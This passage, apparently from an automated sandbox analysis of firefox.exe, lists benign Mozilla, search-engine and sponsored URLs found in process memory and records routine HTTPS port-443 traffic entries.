Source: firefox.exe, 00000003.00000003.1822094452.000001CA0C047000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1798915283.000001CA198CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1646841035.000001CA1B026000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000003.00000003.1535183184.000001CA1B057000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.1528893203.000001CA19CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2015163057.000001CA0B419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2015163057.000001CA0B419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1800223658.000001CA154B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1632639718.000001CA195E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1774904063.000001CA154AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1672954302.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1802512268.000001CA0F15C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705327159.000001CA0EE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000003.00000003.1505427923.000001CA0EF98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000003.00000003.1826663968.000001CA0BEBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1773231866.000001CA15B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1650975540.000001CA15B52000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1747071328.000001CA0BEB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000003.00000003.1807641257.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/firefox-relay-integration
Source: firefox.exe, 00000003.00000003.1631039337.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1728132884.000001CA0C526000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1928262787.000001CA1545D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaPlatformDecoderNotFound
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windowsMediaWMFNeeded
Source: firefox.exe, 00000003.00000003.1720770465.000001CA13657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/update-firefox-latest-release
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1649243278.000001CA1959A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.oGUCFCdKfd-E
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 00000003.00000003.1532015226.000001CA1B437000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2102737389.000001CA085A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2023659253.000001CA085A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000003.00000003.1533147530.000001CA1B12F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com/
Source: firefox.exe, 00000003.00000003.1524889211.000001CA7FE5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 00000003.00000003.1710654212.000001CA0EB0B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: firefox.exe, 00000003.00000003.1671012859.000001CA154E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000003.00000003.1479322892.000001CA157AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_39e4b8f6fd6635158ad433436bdaa069841cfdf8e1989e03
Source: firefox.exe, 00000003.00000003.2105394117.000001CA0CE73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1825167878.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1509442711.000001CA196E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1746053955.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671828475.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000003.00000003.1552358255.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1540065033.000001CA0AEC5000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1553569809.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1529549564.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1541778340.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1550444529.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1952895724.000001CA1A100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1521898630.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1566973694.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1568029139.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1558216014.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1571508369.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1562356175.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1564754564.000001CA0AEB4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1547716853.000001CA0AEB3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1545926516.000001CA0AEB7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1524327650.000001CA0AEB0000.00000004.00000020.00020000.00000000.sdmp, gmpopenh264.dll.tmp.3.drString found in binary or memory: https://www.digicert.com/CPS0
Source: firefox.exe, 00000003.00000003.1478268440.000001CA155EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1478676467.000001CA15B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000003.00000003.1442898301.000001CA09321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1442612663.000001CA09000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000003.00000003.1659605540.000001CA157C4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1671828475.000001CA0F1E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B290000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1513914961.000001CA197FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2073290954.000001CA0CEFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 00000003.00000003.1841335549.000001CA0EE2F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705881637.000001CA0EE2B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2105394117.000001CA0CE8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mobilesuica.com/
Source: firefox.exe, 00000003.00000003.1645054810.000001CA7FE0F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705327159.000001CA0EE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1674522956.000001CA0EEE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000003.00000003.1533302246.000001CA1B10F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705881637.000001CA0EE27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1705881637.000001CA0EE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000000A.00000002.2635536628.00000129187D0000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1649243278.000001CA1959A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
Source: firefox.exe, 00000003.00000003.1502221485.000001CA0EDD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/anything/?
Source: firefox.exe, 00000003.00000003.2018426889.000001CA0B0BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1649243278.000001CA1959A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
Source: firefox.exe, 00000003.00000003.1807641257.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/about/legal/terms/subscription-services/
Source: firefox.exe, 00000003.00000003.1645389070.000001CA1B1DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Z
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: firefox.exe, 00000003.00000003.1807641257.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1536872816.000001CA19C5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: firefox.exe, 00000003.00000003.2016483524.000001CA0B1A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1631039337.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1602997951.000001CA1A9FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2096256603.000001CA0B429000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2014745861.000001CA0B429000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000003.00000003.1789387545.000001CA19798000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1727039209.000001CA0C55C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1504434772.000001CA0C2CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000003.00000003.1440222320.000001CA7F15D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1666117463.000001CA7F14A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000003.00000003.2010688164.000001CA0B5D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000003.00000003.1650975540.000001CA15BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000003.00000003.1527706711.000001CA1B286000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000003.00000003.1635930320.000001CA7F2B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000003.00000003.1524889211.000001CA7FE5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000003.00000003.1710654212.000001CA0EB0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000003.00000003.1439458960.000001CA7F1B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2640388239.000002A67A0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.00000271258E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2658026941.0000012918C06000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.3.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: firefox.exe, 00000003.00000003.1634791308.000036FD10303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1527224774.000001CA1B2BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1667834024.000001CA1B2BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1640176486.000001CA1B2BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/
Source: firefox.exe, 00000003.00000003.1700724596.000001CA154AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2641324645.000002712580A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2641868178.0000012918A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000003.00000003.1628297834.000001CA1B42C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1657219167.000001CA1B42C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1532015226.000001CA1B42E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
